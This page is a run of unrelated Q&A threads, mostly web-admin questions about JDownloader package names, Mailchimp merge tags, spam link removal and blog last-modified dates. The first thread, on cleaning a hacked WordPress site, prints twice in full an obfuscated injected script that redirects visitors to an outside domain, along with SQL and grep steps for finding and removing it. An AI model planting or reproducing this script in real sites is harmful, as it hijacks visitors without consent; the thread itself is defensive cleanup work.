My website got hacked and is now redirecting all new visitors to a shitty website.
I changed all passwords I can think of, installed Wordfence (I'm on wordpress), removed all malicious code from files.
Now I am left with close to 5000 posts in wp_posts table that still contain the same malicious code.
Namely this:
<script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https://www.wow-robotics.xyz','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\x20path=/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](/Android/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](/BlackBerry/i)||navigator['userAgent'][_0x287a('0xd')](/iPhone|iPad|iPod/i)||navigator[_0x287a('0xe')]['match'](/Opera Mini/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](/IEMobile/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};</script>
I tried
UPDATE `wp_posts` SET post_content = REPLACE (post_content, "<script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https://www.wow-robotics.xyz','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\x20path=/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](/Android/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](/BlackBerry/i)||navigator['userAgent'][_0x287a('0xd')](/iPhone|iPad|iPod/i)||navigator[_0x287a('0xe')]['match'](/Opera Mini/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](/IEMobile/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};</script>", " ")
But I get #1064 - Something is wrong in your syntax near'"<script>var _0x2cf4=['MSIE)' in line 1
Thanks for any help.
Thanks to #B. Go I came up with:
UPDATE wp_posts
SET
post_content = REGEXP_REPLACE(post_content,"<script>var _0x2cf4=.*</script>"," ")
WHERE
post_content RLIKE "<script>var _0x2cf4=.*</script>"
Still can't rid of malicious code on one page, but it doesn't seem to be in the DB.
if the malicious code exist in every post, you might need to check your head and footer file which appear in every post and also core js files that could contain malicious code.
Also check if any external js being called when loading page.
If you can ssh to your file, you can grep -nr "var _0x2cf4=" to target the files.
Hope it helps, thanks
Please, read this answer from one good guy:
https://wordpress.stackexchange.com/questions/357465/removing-malware-appended-to-each-post/358141#358141
Hope this helps
Using REGXP function in mysql
UPDATE wp_posts SET post_content = REGEXP_REPLACE(post_content,'<script type="text/javascript">.*</script>'," ") WHERE post_content REGEXP('<script type="text/javascript">.*</script>')
Is there any way of formatting a list of links in a text file, so JDownloader's Linkgrabber knows the package name I want?
For example:
{{packagename1}}http://link-a
{{packagename1}}http://link-b
{{packagename2}}http://link-c
{{packagename3}}http://link-d
{{packagename4}}http://link-e
{{packagename4}}http://link-f
Will put link-a and link-b in "packagename1", link-c in "packagename2", link-d in "packagename3", and link-e and link-f in "packagename4".
Someone in Reddit pointed me to the solution.
If we look in Settings / Packagizer, there's a rule editor.
A custom rule can be made that takes links in the format:
http://link-a#packagename=packagename1
Which puts the downloads found in the link in a package named "packagename1".
(Original image by the user that provided the answer, grooters)
I went through the Merge Tags here and here, but couldn't figure out the syntax that would allow me to show content based on whether the user has certain Tag or not.
Help?
My goal in case it helps:
User subscribes, and is queued for a welcome mail one day later. In meantime that user may get tagged (my way of segmenting them), and so, the next day when that user receives the welcome mail, the content needs to be catered based on the tag that user got.
Got a response from their support saying
merge tags do not work with Tags just yet
here's the whole thing:
While we do have conditional merge tags available, I'm afraid we do
not have any that would work with Tags. To be transparent, Tags were
recently added a few months ago, and there are some features in our
application that has not updated to work with Tags just yet.
Because conditional merge tags do not work with tags yet, the best
option would be to create multiple automations and send them out based
on each tags. If you do it that way, you'll be able to target those in
specific tags with specific content
Dug a little deeper from the first link. There is another link Use Conditional Merge Tag Blocks which contained the below code:
Name
IF-ELSE
Definition
Use ELSE to indicate alternative content to display if the *|MERGE|* tag value is false.
Example
*|IF:MERGE|* content to display *|ELSE:|* alternative content to display *|END:IF|*
Name
ELSEIF
Definition
Use ELSEIF to specify a new *|MERGE|* tag to be matched against if the first *|MERGE|* tag value is false.
Example
*|IF:TRANSACTIONS >= 20|* Enjoy this 40% off coupon! *|COUPON40|*
*|ELSEIF:TRANSACTIONS >= 10|* Enjoy this 20% off coupon! *|COUPON20|*
*|ELSE:|* Enjoy this 10% off coupon! *|COUPON10|* *|END:IF|*
More examples with definitions can be found here.
Hope this is the answer you were after.
My website is getting spammed with entries such as:
<a style="text-decoration:none" href="/amoxicillin-kamagra-shop">.</a>
I want to filter those out with jQuery, as there are too many to do it manually through the UI (wayyy too tedious). The challenge is determining the SPAM-matching criteria, such as the HTML tag info.
So, for example, if I determine that most or all spam is of the form
<a style="text-decoration:none ... >.</a>
How would I delete those entries with jQuery?
DELETE from yourtable WHERE string like '<%a style="text-decoration:none%>.%'
New to all this, trying to figure out how can I add a last modified variable to my blog so that when I issue rake deploy in git all posts that changed with this commit display the current date (ideally localized). Where should I start looking ?
EDIT: just noticed that on the sitemap.xml there is this information:
<url>
<loc>http://Utumno.github.io/blog/2014/05/02/eclipz/</loc>
- <lastmod>2014-06-26T19:19:00+01:00</lastmod>
+ <lastmod>2014-07-06T17:36:37+01:00</lastmod>
</url>
So how could I use this ? - I would like to add something in some layout file so all posts display their last modified time - I find it essential for technical posts.